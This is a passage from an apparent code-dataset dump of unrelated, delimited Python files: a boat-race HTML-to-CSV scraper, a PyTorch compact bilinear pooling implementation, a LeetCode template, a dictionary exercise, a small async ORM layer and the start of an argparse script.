        if 'weather1_bodyUnitImage is-wind' not in tag_html:
            continue
        for number, label in _WIND_DIRECTIONS.items():
            if '"weather1_bodyUnitImage is-wind{}"'.format(number) in tag_html:
                return label
    return '不明'


def mkcsv_t_info_h():
    """Build the import CSV for the race-info header table 't_info_h' from
    the downloaded last-minute-info HTML files.

    One CSV record per HTML file, with the date / pool code / race number
    taken from the file name and the weather fields scraped from the page.
    Files whose page reports "no data" are skipped.
    """
    print('直前情報ヘッダテーブル「t_info_h」のインポートCSVファイル 開始')
    in_path = BASE_DIR + '/200_html/last_info'
    out_file = BASE_DIR + '/210_csv/t_info_h.csv'
    with open(out_file, 'w') as fw:
        for item in os.listdir(path=in_path):
            if item != '.html' and item != '.DS_Store':
                in_file = in_path + '/' + item
                print("==> 処理中[%s]" % (in_file))
                with open(in_file, 'r') as fb:
                    html = fb.read()
                # Skip pages that report "no data available".
                if 'データがありません。' in html:
                    continue
                soup = BeautifulSoup(html, 'html.parser')
                # Key fields are encoded in the file name:
                # YYYYMMDD (8) + pool code (2) + race number (2).
                t_info_h_yyyymmdd = item[0:8]
                t_info_h_pool_code = item[8:10]
                t_info_h_race_no = item[10:12]
                # Weather data spans appear in page order: 1=temperature,
                # 2=wind speed, 3=water temperature, 4=wave height.
                t_info_h_temperature = _nth_label_data(soup, 1, '℃')
                t_info_h_weather = _weather_label(soup)
                t_info_h_wind_speed = _nth_label_data(soup, 2, 'm')
                t_info_h_water_temperature = _nth_label_data(soup, 3, '℃')
                t_info_h_wave_height = _nth_label_data(soup, 4, 'cm')
                t_info_h_wind = _wind_direction(soup)
                # Assemble the CSV record: text fields quoted, numeric bare.
                fields = [
                    '"' + t_info_h_yyyymmdd + '"',
                    '"' + t_info_h_pool_code + '"',
                    '"' + t_info_h_race_no + '"',
                    t_info_h_temperature,
                    '"' + t_info_h_weather + '"',
                    t_info_h_wind_speed,
                    t_info_h_water_temperature,
                    t_info_h_wave_height,
                    '"' + t_info_h_wind + '"',
                ]
                fw.write(','.join(fields) + '\n')
    print('直前情報ヘッダーテーブル「t_info_h」のインポートCSVファイル 完了')
# Main: build the import CSV for the race-info header table 't_info_h'.
mkcsv_t_info_h()
| StarcoderdataPython |
1883950 | <reponame>lizhongguo/pytorch-b3d<filename>CompactBilinearPoolingFourStream.py<gh_stars>1-10
import types
import torch
import torch.nn as nn
from torch.autograd import Function
def CountSketchFn_forward(h, s, output_size, x, force_cpu_scatter_add=False):
    """Project x of shape (..., input_size) to its count sketch of shape
    (..., output_size):  out[..., j] = sum over i with h[i] == j of s[i] * x[..., i].
    """
    in_shape = tuple(x.size())
    broadcast_shape = (1,) * (len(in_shape) - 1) + (in_shape[-1],)
    sketch_shape = in_shape[:-1] + (output_size,)
    # Sign-flip each channel, then scatter-add it into its bucket h[i].
    signed_x = x * s.view(broadcast_shape)
    buckets = h.view(broadcast_shape).expand(in_shape)
    sketch = x.new(*sketch_shape).zero_()
    if force_cpu_scatter_add:
        # Work around GPU scatter_add issues by accumulating on the CPU.
        return sketch.cpu().scatter_add_(-1, buckets.cpu(), signed_x.cpu()).cuda()
    return sketch.scatter_add_(-1, buckets, signed_x)
def CountSketchFn_backward(h, s, x_size, grad_output):
    """Backward of the count sketch: route each output gradient back to the
    input channel that produced it and undo the sign flip.
    Since out[h_i] += s_i * x_i, we have d out[h_i] / d x_i = s_i."""
    broadcast_shape = (1,) * (len(x_size) - 1) + (x_size[-1],)
    buckets = h.view(broadcast_shape).expand(x_size)
    return grad_output.gather(-1, buckets) * s.view(broadcast_shape)
class CountSketchFn(Function):
    # Autograd wrapper around the count sketch: forward scatters the signed
    # input into output_size buckets; backward gathers the gradient back.

    @staticmethod
    def forward(ctx, h, s, output_size, x, force_cpu_scatter_add=False):
        x_size = tuple(x.size())  # NOTE(review): unused; ctx.x_size below is what backward reads.
        ctx.save_for_backward(h, s)
        ctx.x_size = tuple(x.size())
        return CountSketchFn_forward(h, s, output_size, x, force_cpu_scatter_add)

    @staticmethod
    def backward(ctx, grad_output):
        h, s = ctx.saved_variables
        grad_x = CountSketchFn_backward(h, s, ctx.x_size, grad_output)
        # One gradient per forward input actually passed via apply(h, s,
        # output_size, x); only x is differentiable.
        return None, None, None, grad_x
class CountSketch(nn.Module):
    r"""Compute the count sketch over an input signal.

    .. math::

        out_j = \sum_{i : j = h_i} s_i x_i

    Args:
        input_size (int): Number of channels in the input array
        output_size (int): Number of channels in the output sketch
        h (array, optional): Optional array of size input_size of indices in the range [0,output_size]
        s (array, optional): Optional array of size input_size of -1 and 1.

    .. note::

        If h and s are None, they will be automatically be generated using LongTensor.random_.

    Shape:
        - Input: (...,input_size)
        - Output: (...,output_size)

    References:
        <NAME> et al. "Compact Bilinear Pooling" in Proceedings of IEEE Conference on Computer Vision and Pattern Recognition (2016).
        <NAME> et al. "Multimodal Compact Bilinear Pooling for Visual Question Answering and Visual Grounding", arXiv:1606.01847 (2016).
    """

    def __init__(self, input_size, output_size, h=None, s=None):
        super(CountSketch, self).__init__()

        self.input_size = input_size
        self.output_size = output_size

        if h is None:
            # Random bucket index in [0, output_size) for each input channel.
            h = torch.LongTensor(input_size).random_(0, output_size)
        if s is None:
            # Random sign (+1 / -1) for each input channel.
            s = 2 * torch.Tensor(input_size).random_(0, 2) - 1

        # The Variable h being a list of indices,
        # If the type of this module is changed (e.g. float to double),
        # the variable h should remain a LongTensor
        # therefore we force float() and double() to be no-ops on the variable h.
        def identity(self):
            return self

        h.float = types.MethodType(identity, h)
        h.double = types.MethodType(identity, h)

        # Registered as buffers so they move with the module and are saved
        # in the state dict, but are not trained.
        self.register_buffer('h', h)
        self.register_buffer('s', s)

    def forward(self, x):
        # Last dimension must be the declared input size.
        x_size = list(x.size())
        assert(x_size[-1] == self.input_size)
        return CountSketchFn.apply(self.h, self.s, self.output_size, x)
def ComplexMultiply_forward(X_re, X_im, Y_re, Y_im):
    """Element-wise complex product Z = (X_re + i X_im) * (Y_re + i Y_im),
    returned as the pair (Z_re, Z_im).

    Rewritten with plain tensor arithmetic: the original used the legacy
    positional form ``torch.addcmul(t, value, t1, t2)``, which modern
    PyTorch releases reject.
    """
    Z_re = X_re * Y_re - X_im * Y_im
    Z_im = X_re * Y_im + X_im * Y_re
    return Z_re, Z_im
def ComplexMultiply_backward(X_re, X_im, Y_re, Y_im, grad_Z_re, grad_Z_im):
    """Gradients of the complex product Z = X * Y with respect to both
    factors, given the upstream gradients of Z's real and imaginary parts.

    Rewritten with plain tensor arithmetic: the original used the legacy
    positional form ``torch.addcmul(t, value, t1, t2)``, which modern
    PyTorch releases reject.
    """
    grad_X_re = grad_Z_re * Y_re + grad_Z_im * Y_im
    grad_X_im = grad_Z_im * Y_re - grad_Z_re * Y_im
    grad_Y_re = grad_Z_re * X_re + grad_Z_im * X_im
    grad_Y_im = grad_Z_im * X_re - grad_Z_re * X_im
    return grad_X_re, grad_X_im, grad_Y_re, grad_Y_im
def ComplexMultiplyFourStream_forward(A_re, A_im, B_re, B_im, C_re, C_im, D_re, D_im):
    # Four-way complex product Z = (A*B) * (C*D), computed pairwise.
    X_re, X_im = ComplexMultiply_forward(A_re, A_im, B_re, B_im)
    Y_re, Y_im = ComplexMultiply_forward(C_re, C_im, D_re, D_im)
    Z_re, Z_im = ComplexMultiply_forward(X_re, X_im, Y_re, Y_im)
    return Z_re, Z_im
def ComplexMultiplyFourStream_backward(A_re, A_im, B_re, B_im, C_re, C_im, D_re, D_im, grad_Z_re, grad_Z_im):
    # Backward of Z = (A*B) * (C*D): recompute the intermediate products
    # X = A*B and Y = C*D, then chain the pairwise complex gradients.
    X_re, X_im = ComplexMultiply_forward(A_re, A_im, B_re, B_im)
    Y_re, Y_im = ComplexMultiply_forward(C_re, C_im, D_re, D_im)
    # Gradient w.r.t. X and Y from Z, then w.r.t. the four original factors.
    grad_X_re, grad_X_im, grad_Y_re, grad_Y_im = ComplexMultiply_backward(
        X_re, X_im, Y_re, Y_im, grad_Z_re, grad_Z_im)
    grad_A_re, grad_A_im, grad_B_re, grad_B_im = ComplexMultiply_backward(
        A_re, A_im, B_re, B_im, grad_X_re, grad_X_im)
    grad_C_re, grad_C_im, grad_D_re, grad_D_im = ComplexMultiply_backward(
        C_re, C_im, D_re, D_im, grad_Y_re, grad_Y_im)
    return grad_A_re, grad_A_im, grad_B_re, grad_B_im, grad_C_re, grad_C_im, grad_D_re, grad_D_im
class ComplexMultiply(torch.autograd.Function):
    # Autograd-aware element-wise complex multiplication; real and
    # imaginary parts are carried as separate tensors.

    @staticmethod
    def forward(ctx, X_re, X_im, Y_re, Y_im):
        ctx.save_for_backward(X_re, X_im, Y_re, Y_im)
        return ComplexMultiply_forward(X_re, X_im, Y_re, Y_im)

    @staticmethod
    def backward(ctx, grad_Z_re, grad_Z_im):
        X_re, X_im, Y_re, Y_im = ctx.saved_tensors
        return ComplexMultiply_backward(X_re, X_im, Y_re, Y_im, grad_Z_re, grad_Z_im)
class ComplexMultiplyFourStream(torch.autograd.Function):
    # Autograd-aware four-way complex multiplication Z = (A*B) * (C*D);
    # real and imaginary parts are carried as separate tensors.

    @staticmethod
    def forward(ctx, A_re, A_im, B_re, B_im, C_re, C_im, D_re, D_im):
        ctx.save_for_backward(A_re, A_im, B_re, B_im, C_re, C_im, D_re, D_im)
        return ComplexMultiplyFourStream_forward(A_re, A_im, B_re, B_im, C_re, C_im, D_re, D_im)

    @staticmethod
    def backward(ctx, grad_Z_re, grad_Z_im):
        A_re, A_im, B_re, B_im, C_re, C_im, D_re, D_im = ctx.saved_tensors
        return ComplexMultiplyFourStream_backward(A_re, A_im, B_re, B_im, C_re, C_im, D_re, D_im, grad_Z_re, grad_Z_im)
class CompactBilinearPoolingFn(Function):
    # Compact bilinear pooling: count-sketch both inputs, convolve the two
    # sketches via FFT (element-wise complex product in frequency domain),
    # and return the real part of the inverse transform.
    # NOTE(review): torch.rfft/torch.irfft were removed in PyTorch >= 1.8;
    # this code presumably targets an older release — confirm before upgrading.
    # NOTE(review): the backward pass uses the legacy positional
    # torch.addcmul(t, value, t1, t2) form, also rejected by modern PyTorch.

    @staticmethod
    def forward(ctx, h1, s1, h2, s2, output_size, x, y, force_cpu_scatter_add=False):
        ctx.save_for_backward(h1, s1, h2, s2, x, y)
        # Shapes and options are stashed for the backward recomputation.
        ctx.x_size = tuple(x.size())
        ctx.y_size = tuple(y.size())
        ctx.force_cpu_scatter_add = force_cpu_scatter_add
        ctx.output_size = output_size

        # Compute the count sketch of each input, then its FFT.
        px = CountSketchFn_forward(
            h1, s1, output_size, x, force_cpu_scatter_add)
        fx = torch.rfft(px, 1)
        re_fx = fx.select(-1, 0)
        im_fx = fx.select(-1, 1)
        del px
        py = CountSketchFn_forward(
            h2, s2, output_size, y, force_cpu_scatter_add)
        fy = torch.rfft(py, 1)
        re_fy = fy.select(-1, 0)
        im_fy = fy.select(-1, 1)
        del py

        # Convolution of the two sketches == complex product of their FFTs.
        re_prod, im_prod = ComplexMultiply_forward(re_fx, im_fx, re_fy, im_fy)

        # Back to the real domain; the imaginary part should be zeros.
        re = torch.irfft(torch.stack((re_prod, im_prod),
                                     re_prod.dim()), 1, signal_sizes=(output_size,))

        return re

    @staticmethod
    def backward(ctx, grad_output):
        h1, s1, h2, s2, x, y = ctx.saved_tensors

        # Recompute part of the forward pass (the two count sketches) to
        # get the inputs to the complex product; cheaper than saving them.
        px = CountSketchFn_forward(
            h1, s1, ctx.output_size, x, ctx.force_cpu_scatter_add)
        py = CountSketchFn_forward(
            h2, s2, ctx.output_size, y, ctx.force_cpu_scatter_add)

        # Convert the upstream gradient to the Fourier domain.
        grad_output = grad_output.contiguous()
        grad_prod = torch.rfft(grad_output, 1)
        grad_re_prod = grad_prod.select(-1, 0)
        grad_im_prod = grad_prod.select(-1, 1)

        # Gradient of x: recompute fy, multiply by its conjugate
        # (legacy addcmul form: addcmul(t, value, t1, t2) == t + value*t1*t2).
        fy = torch.rfft(py, 1)
        re_fy = fy.select(-1, 0)
        im_fy = fy.select(-1, 1)
        del py
        grad_re_fx = torch.addcmul(
            grad_re_prod * re_fy, 1, grad_im_prod, im_fy)
        grad_im_fx = torch.addcmul(
            grad_im_prod * re_fy, -1, grad_re_prod, im_fy)
        grad_fx = torch.irfft(torch.stack(
            (grad_re_fx, grad_im_fx), grad_re_fx.dim()), 1, signal_sizes=(ctx.output_size,))
        # Route the sketch gradient back through the count sketch of x.
        grad_x = CountSketchFn_backward(h1, s1, ctx.x_size, grad_fx)
        del re_fy, im_fy, grad_re_fx, grad_im_fx, grad_fx

        # Gradient of y: symmetric, using the recomputed fx.
        fx = torch.rfft(px, 1)
        re_fx = fx.select(-1, 0)
        im_fx = fx.select(-1, 1)
        del px
        grad_re_fy = torch.addcmul(
            grad_re_prod * re_fx, 1, grad_im_prod, im_fx)
        grad_im_fy = torch.addcmul(
            grad_im_prod * re_fx, -1, grad_re_prod, im_fx)
        grad_fy = torch.irfft(torch.stack(
            (grad_re_fy, grad_im_fy), grad_re_fy.dim()), 1, signal_sizes=(ctx.output_size,))
        # Route the sketch gradient back through the count sketch of y.
        grad_y = CountSketchFn_backward(h2, s2, ctx.y_size, grad_fy)
        del re_fx, im_fx, grad_re_fy, grad_im_fy, grad_fy

        # One slot per forward input; only x and y are differentiable.
        return None, None, None, None, None, grad_x, grad_y, None
class CompactBilinearPoolingFnFourStream(Function):
    """autograd Function for compact bilinear pooling of four input streams.

    forward() computes the circular convolution of the four count sketches
    via irfft(rfft(psi_a) * rfft(psi_b) * rfft(psi_c) * rfft(psi_d)); each
    stream i has its own sketch parameters (h_i, s_i).

    NOTE(review): built on the legacy torch.rfft/irfft API (torch < 1.8).
    """

    @staticmethod
    def forward(ctx, h1, s1, h2, s2, h3, s3, h4, s4, output_size, a, b, c, d, force_cpu_scatter_add=False):
        ctx.save_for_backward(h1, s1, h2, s2, h3, s3, h4, s4, a, b, c, d)
        ctx.a_size = tuple(a.size())
        ctx.b_size = tuple(b.size())
        ctx.c_size = tuple(c.size())
        ctx.d_size = tuple(d.size())
        ctx.force_cpu_scatter_add = force_cpu_scatter_add
        ctx.output_size = output_size

        # Count sketch of each input, then its FFT.
        pa = CountSketchFn_forward(
            h1, s1, output_size, a, force_cpu_scatter_add)
        fa = torch.rfft(pa, 1)
        re_fa = fa.select(-1, 0)
        im_fa = fa.select(-1, 1)
        del pa

        pb = CountSketchFn_forward(
            h2, s2, output_size, b, force_cpu_scatter_add)
        fb = torch.rfft(pb, 1)
        re_fb = fb.select(-1, 0)
        im_fb = fb.select(-1, 1)
        del pb

        pc = CountSketchFn_forward(
            h3, s3, output_size, c, force_cpu_scatter_add)
        fc = torch.rfft(pc, 1)
        re_fc = fc.select(-1, 0)
        im_fc = fc.select(-1, 1)
        del pc

        pd = CountSketchFn_forward(
            h4, s4, output_size, d, force_cpu_scatter_add)
        fd = torch.rfft(pd, 1)
        re_fd = fd.select(-1, 0)
        im_fd = fd.select(-1, 1)
        del pd

        # Convolution of the sketches == element-wise complex product in the
        # Fourier domain.
        re_prod, im_prod = ComplexMultiplyFourStream_forward(
            re_fa, im_fa, re_fb, im_fb, re_fc, im_fc, re_fd, im_fd)

        # Back to the real domain; the imaginary part should be (numerically) zero.
        re = torch.irfft(torch.stack((re_prod, im_prod),
                                     re_prod.dim()), 1, signal_sizes=(output_size,))
        return re

    @staticmethod
    def backward(ctx, grad_output):
        """Gradients w.r.t. a, b, c, d; sketch parameters get None."""
        h1, s1, h2, s2, h3, s3, h4, s4, a, b, c, d = ctx.saved_tensors

        # Recompute the count sketch of each input (cheaper than saving the
        # intermediate FFTs).
        # BUGFIX: pc and pd previously reused (h2, s2); each stream must be
        # re-sketched with its own parameters or the gradients of c and d are
        # computed against the wrong sketch.
        pa = CountSketchFn_forward(
            h1, s1, ctx.output_size, a, ctx.force_cpu_scatter_add)
        pb = CountSketchFn_forward(
            h2, s2, ctx.output_size, b, ctx.force_cpu_scatter_add)
        pc = CountSketchFn_forward(
            h3, s3, ctx.output_size, c, ctx.force_cpu_scatter_add)
        pd = CountSketchFn_forward(
            h4, s4, ctx.output_size, d, ctx.force_cpu_scatter_add)

        # Incoming gradient, converted to the Fourier domain.
        grad_output = grad_output.contiguous()
        grad_prod = torch.rfft(grad_output, 1)
        grad_re_prod = grad_prod.select(-1, 0)
        grad_im_prod = grad_prod.select(-1, 1)

        # FFT of each recomputed sketch.
        fa = torch.rfft(pa, 1)
        re_fa = fa.select(-1, 0)
        im_fa = fa.select(-1, 1)
        del pa
        fb = torch.rfft(pb, 1)
        re_fb = fb.select(-1, 0)
        im_fb = fb.select(-1, 1)
        del pb
        fc = torch.rfft(pc, 1)
        re_fc = fc.select(-1, 0)
        im_fc = fc.select(-1, 1)
        del pc
        fd = torch.rfft(pd, 1)
        re_fd = fd.select(-1, 0)
        im_fd = fd.select(-1, 1)
        del pd

        # Backprop through the four-way complex product.
        grad_re_fa, grad_im_fa, grad_re_fb, grad_im_fb, grad_re_fc, grad_im_fc, grad_re_fd, grad_im_fd = \
            ComplexMultiplyFourStream_backward(
                re_fa, im_fa, re_fb, im_fb, re_fc, im_fc, re_fd, im_fd, grad_re_prod, grad_im_prod)

        # Map each Fourier-domain gradient back to the temporal domain.
        grad_fa = torch.irfft(torch.stack(
            (grad_re_fa, grad_im_fa), grad_re_fa.dim()), 1, signal_sizes=(ctx.output_size,))
        grad_fb = torch.irfft(torch.stack(
            (grad_re_fb, grad_im_fb), grad_re_fb.dim()), 1, signal_sizes=(ctx.output_size,))
        grad_fc = torch.irfft(torch.stack(
            (grad_re_fc, grad_im_fc), grad_re_fc.dim()), 1, signal_sizes=(ctx.output_size,))
        grad_fd = torch.irfft(torch.stack(
            (grad_re_fd, grad_im_fd), grad_re_fd.dim()), 1, signal_sizes=(ctx.output_size,))

        # Finally scatter each gradient back through its count sketch.
        grad_a = CountSketchFn_backward(h1, s1, ctx.a_size, grad_fa)
        grad_b = CountSketchFn_backward(h2, s2, ctx.b_size, grad_fb)
        grad_c = CountSketchFn_backward(h3, s3, ctx.c_size, grad_fc)
        grad_d = CountSketchFn_backward(h4, s4, ctx.d_size, grad_fd)
        del re_fa, im_fa, grad_re_fa, grad_im_fa, grad_fa, \
            re_fb, im_fb, grad_re_fb, grad_im_fb, grad_fb, \
            re_fc, im_fc, grad_re_fc, grad_im_fc, grad_fc, \
            re_fd, im_fd, grad_re_fd, grad_im_fd, grad_fd

        # One None per non-differentiable forward argument.
        return None, None, None, None, None, None, None, None, None, grad_a, grad_b, grad_c, grad_d, None
class CompactBilinearPooling(nn.Module):
    r"""Compact bilinear pooling layer for two inputs.

    Combines feature vectors x and y into one output_size-dimensional vector
    via the circular convolution of their count sketches:

    .. math::
        out = \Psi (x,h_1,s_1) \ast \Psi (y,h_2,s_2)

    Args:
        input1_size (int): channels of the first input.
        input2_size (int): channels of the second input.
        output_size (int): channels of the pooled output.
        h1, s1, h2, s2 (array, optional): sketch parameters; generated
            randomly by CountSketch when omitted.
        force_cpu_scatter_add (bool, optional): run scatter_add on CPU
            (testing only).

    Shape:
        - Input 1: (..., input1_size)
        - Input 2: (..., input2_size)
        - Output:  (..., output_size)

    References:
        Yang Gao et al., "Compact Bilinear Pooling", CVPR 2016.
        Akira Fukui et al., "Multimodal Compact Bilinear Pooling for Visual
        Question Answering and Visual Grounding", arXiv:1606.01847 (2016).
    """

    def __init__(self, input1_size, input2_size, output_size, h1=None, s1=None, h2=None, s2=None, force_cpu_scatter_add=False):
        super(CompactBilinearPooling, self).__init__()
        # Attribute assignment registers the sketches as submodules.
        self.sketch1 = CountSketch(input1_size, output_size, h1, s1)
        self.sketch2 = CountSketch(input2_size, output_size, h2, s2)
        self.output_size = output_size
        self.force_cpu_scatter_add = force_cpu_scatter_add

    def forward(self, x, y=None):
        # With a single argument, pool the input with itself.
        y = x if y is None else y
        return CompactBilinearPoolingFn.apply(
            self.sketch1.h, self.sketch1.s,
            self.sketch2.h, self.sketch2.s,
            self.output_size, x, y, self.force_cpu_scatter_add)
class CompactBilinearPoolingFourStream(nn.Module):
    r"""Compute the compact bilinear pooling of four input arrays a, b, c and d

    .. math::
        out = \Psi (a,h_1,s_1) \ast \Psi (b,h_2,s_2) \ast \Psi (c,h_3,s_3) \ast \Psi (d,h_4,s_4)

    Args:
        input1_size (int): Number of channels in the first input array
        input2_size (int): Number of channels in the second input array
        input3_size (int): Number of channels in the third input array
        input4_size (int): Number of channels in the fourth input array
        output_size (int): Number of channels in the output array
        h1, h2, h3, h4 (array, optional): Optional arrays of size input_size of indices in the range [0,output_size]
        s1, s2, s3, s4 (array, optional): Optional arrays of size input_size of -1 and 1.
        force_cpu_scatter_add (boolean, optional): Force the scatter_add operation to run on CPU for testing purposes

    .. note::
        Any of h1..h4 / s1..s4 left as None is generated automatically using LongTensor.random_.

    Shape:
        - Input i: (...,input{i}_size) for i in 1..4
        - Output: (...,output_size)

    References:
        Yang Gao et al. "Compact Bilinear Pooling" in Proceedings of IEEE Conference on Computer Vision and Pattern Recognition (2016).
        Akira Fukui et al. "Multimodal Compact Bilinear Pooling for Visual Question Answering and Visual Grounding", arXiv:1606.01847 (2016).
    """

    def __init__(self, input1_size, input2_size, input3_size, input4_size, output_size,
                 h1=None, s1=None, h2=None, s2=None, h3=None, s3=None, h4=None, s4=None, force_cpu_scatter_add=False):
        super(CompactBilinearPoolingFourStream, self).__init__()
        # One count sketch per input stream, registered as submodules.
        self.add_module('sketch1', CountSketch(
            input1_size, output_size, h1, s1))
        self.add_module('sketch2', CountSketch(
            input2_size, output_size, h2, s2))
        self.add_module('sketch3', CountSketch(
            input3_size, output_size, h3, s3))
        self.add_module('sketch4', CountSketch(
            input4_size, output_size, h4, s4))
        self.output_size = output_size
        self.force_cpu_scatter_add = force_cpu_scatter_add

    def forward(self, a, b, c, d):
        return CompactBilinearPoolingFnFourStream.apply(self.sketch1.h, self.sketch1.s, self.sketch2.h, self.sketch2.s,
                                                        self.sketch3.h, self.sketch3.s, self.sketch4.h, self.sketch4.s,
                                                        self.output_size, a, b, c, d, self.force_cpu_scatter_add)
| StarcoderdataPython |
8129085 | <gh_stars>0
# DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#522. Longest Uncommon Subsequence II
#Given a list of strings, you need to find the longest uncommon subsequence among them. The longest uncommon subsequence is defined as the longest subsequence of one of these strings and this subsequence should not be any subsequence of the other strings.
#A subsequence is a sequence that can be derived from one sequence by deleting some characters without changing the order of the remaining elements. Trivially, any string is a subsequence of itself and an empty string is a subsequence of any string.
#The input will be a list of strings, and the output needs to be the length of the longest uncommon subsequence. If the longest uncommon subsequence doesn't exist, return -1.
#Example 1:
#Input: "aba", "cdc", "eae"
#Output: 3
#Note:
#All the given strings' lengths will not exceed 10.
#The length of the given list will be in the range of [2, 50].
#class Solution(object):
# def findLUSlength(self, strs):
# """
# :type strs: List[str]
# :rtype: int
# """
# Time Is Money | StarcoderdataPython |
3524229 | <filename>Python/Fundamentals/Dictionaries(lab-exercises)/Exercises/Force Book.py
# Force Book: track which "side" each person belongs to.
#   "<side> | <user>"  -> register user on side, unless already known anywhere
#   "<user> -> <side>" -> move user to side (removing from any previous side)
#   "Lumpawaroo"       -> print the report and stop
force_book = {}

while True:
    line = input()

    if line == "Lumpawaroo":
        # Report: sides in first-seen order, skipping emptied sides.
        for side, members in force_book.items():
            if not members:
                continue
            print(f"Side: {side}, Members: {len(members)}")
            for member in members:
                print(f"! {member}")
        break

    if "|" in line:
        parts = line.split(" | ")
        side, user = parts[0], parts[1]
        # Ignore registrations for users already on any side.
        if not any(user in members for members in force_book.values()):
            force_book.setdefault(side, []).append(user)
    elif "->" in line:
        parts = line.split(" -> ")
        user, side = parts[0], parts[1]
        # Remove the user from whichever side currently holds them.
        for members in force_book.values():
            if user in members:
                members.remove(user)
                break
        force_book.setdefault(side, []).append(user)
        print(f"{user} joins the {side} side!")
| StarcoderdataPython |
5121084 | <gh_stars>1-10
from typing import NamedTuple, Mapping, Dict, Any, List, Optional
from resync.fields import Field, ForeignKeyField, ReverseForeignKeyField
from resync.manager import Manager
from resync.utils import RegistryPatternMetaclass
from resync.diff import DiffObject
# Per-class metadata container: the backing table name, the mapping of
# field name -> Field descriptor, and the reverse FK relations that
# ModelBase registers onto related models after class creation.
ModelMeta = NamedTuple(
    'Meta',
    [('table', str), ('fields', Mapping['str', Field]), ('reverse_relations', Mapping[str, ReverseForeignKeyField])]
)
class DocumentBase(type):
    """Metaclass that harvests Field descriptors from a document class body.

    Field attributes are removed from the class namespace and collected —
    together with fields inherited from base classes — into
    ``cls._meta.fields``.  The table name is left as None here; ModelBase
    fills it in for top-level models.
    """

    def __new__(mcs, name, bases, attrs):
        fields = {}
        # Inherit fields from bases first so subclass declarations override.
        for base in bases:
            fields.update(base._meta.fields)
        non_field_attrs = {}
        for key, value in attrs.items():
            if isinstance(value, Field):
                # Tell the descriptor which attribute name it was bound to.
                value.name = key
                fields[key] = value
            else:
                non_field_attrs[key] = value
        # Create the class without the Field attributes in its namespace.
        new_class = super(DocumentBase, mcs).__new__(mcs, name, bases, non_field_attrs)
        new_class._meta = ModelMeta(None, fields, {})
        return new_class
class ModelBase(DocumentBase, RegistryPatternMetaclass):
    """Metaclass for top-level models.

    Adds on top of DocumentBase: a table name (the 'table' class attribute or
    the lowercased class name), registry-pattern registration (via
    RegistryPatternMetaclass), and reverse foreign-key accessors installed on
    each FK's target model.
    """

    def __new__(mcs, name, bases, attrs):
        # 'table' class attribute overrides the default table name.
        table_name = attrs.pop('table', name.lower())
        foreign_key_fields = {}
        for key, value in attrs.items():
            if isinstance(value, ForeignKeyField):
                foreign_key_fields[key] = value
        new_class = super(ModelBase, mcs).__new__(mcs, name, bases, attrs)
        # Rebuild _meta with the real table name (fields were set by DocumentBase).
        new_class._meta = ModelMeta(table_name, new_class._meta.fields, {})
        # Expose a reverse accessor on every FK target model, named either by
        # the field's related_name or '<thismodel>_set'.
        for foreign_key_field_name, field in foreign_key_fields.items():
            related_model = field.model
            reverse_relation_name = field.related_name or name.lower() + '_set'
            related_model._meta.reverse_relations[reverse_relation_name] = ReverseForeignKeyField(new_class, foreign_key_field_name)
        return new_class

    @property
    def table(cls):
        # Convenience: SomeModel.table -> backing table name.
        return cls._meta.table
class NestedDocument(metaclass=DocumentBase):
    """A document embedded inside a model.

    Its fields are collected by the DocumentBase metaclass into
    ``self._meta.fields``; this class provides (de)serialization between
    Python attribute values and their database representation.
    """

    def __init__(self, **kwargs):
        declared = frozenset(self._meta.fields.keys())
        for name, value in kwargs.items():
            if name not in declared:
                raise AttributeError(
                    '{} received unexpected keyword argument {}.'.format(self.__class__.__name__, name))
            setattr(self, name, value)
        # Any declared field not supplied gets its declared default.
        for name in declared.difference(kwargs.keys()):
            setattr(self, name, self._meta.fields[name].default)

    def to_db(self) -> Dict[str, Any]:
        """Serialize this document's current field values for the database.

        Called by parent/container models when they are serialized.
        """
        return self.serialize_fields(self._get_field_data())

    @classmethod
    def from_db(cls, data_dict: Mapping[str, Any]):
        """Build an instance from raw database data, deserializing each field.

        Missing keys fall back to the field's declared default.
        """
        values = {
            name: field.from_db(data_dict.get(name, field.default))
            for name, field in cls._meta.fields.items()
        }
        return cls(**values)

    @classmethod
    def serialize_fields(cls, data_dict: Mapping[str, Any]) -> Dict[str, Any]:
        """Convert Python field values to their database form.

        Raises KeyError if any key is not a declared field; keys absent from
        *data_dict* are simply omitted from the result.
        """
        return {
            name: cls._meta.fields[name].to_db(value)
            for name, value in data_dict.items()
        }

    def _get_field_data(self):
        """Return this instance's field values as a plain dict."""
        return {name: getattr(self, name) for name in self._meta.fields.keys()}
class Model(NestedDocument, metaclass=ModelBase):
    """Top-level persisted document, backed by a table and a Manager.

    The ``objects`` Manager is attached by :func:`setup` after all models are
    defined.
    """

    class DoesNotExist(Exception):
        """Raised when a lookup matches no row."""
        pass

    def __init__(self, **kwargs):
        super(Model, self).__init__(**kwargs)
        # Reverse FK accessors require a primary key, so only saved
        # instances (id set) get them.
        if self.id is not None:
            for related_name, field in self._meta.reverse_relations.items():
                setattr(self, related_name, field.get_queryset(self.id))

    async def save(self) -> Optional[List[DiffObject]]:
        """Insert this instance (when id is None) or update the existing row.

        Returns the list of DiffObjects describing an update, or None for a
        fresh insert (the new id is written back onto self).
        """
        field_data = self._get_field_data()
        create = self.id is None
        if create:
            # Let the database assign the primary key.
            field_data.pop('id')
            new_obj = await self.objects.create(**field_data)
            self.id = new_obj.id
            changes = None
        else:
            changes = await self.objects.update(self, **field_data)
        return changes

    def to_db(self):
        # Never send a null id on insert; the database assigns it.
        serialized_data = super(Model, self).to_db()
        if self.id is None:
            serialized_data.pop('id')
        return serialized_data
def setup():
    """Attach a Manager to every registered Model subclass.

    Must run after all model classes are defined; classes that already
    declare their own ``objects`` manager keep it.
    """
    for model_cls in RegistryPatternMetaclass.REGISTRY:
        if model_cls is Model:
            continue
        if not hasattr(model_cls, 'objects'):
            model_cls.objects = Manager()
        model_cls.objects.attach_model(model_cls)
| StarcoderdataPython |
3558770 | import argparse
from glob import glob
import numpy as np
import pandas as pd
def _str2bool(value):
    """Parse a command-line boolean: 'true'/'1'/'yes'/'y' (any case) -> True."""
    if isinstance(value, bool):
        return value
    return value.strip().lower() in ('true', '1', 'yes', 'y')


def parse_arguments(parser, args=None):
    """Attach this script's CLI options to *parser* and parse them.

    :param parser: an argparse.ArgumentParser to configure.
    :param args: optional argv list; defaults to sys.argv (for testability).
    :return: the parsed argparse.Namespace.

    Fix: ``type=bool`` in argparse treats any non-empty string as True, so
    ``--text_only False`` used to parse as True; booleans now go through
    _str2bool.
    """
    parser.add_argument('--data_dir', type=str, default=None)
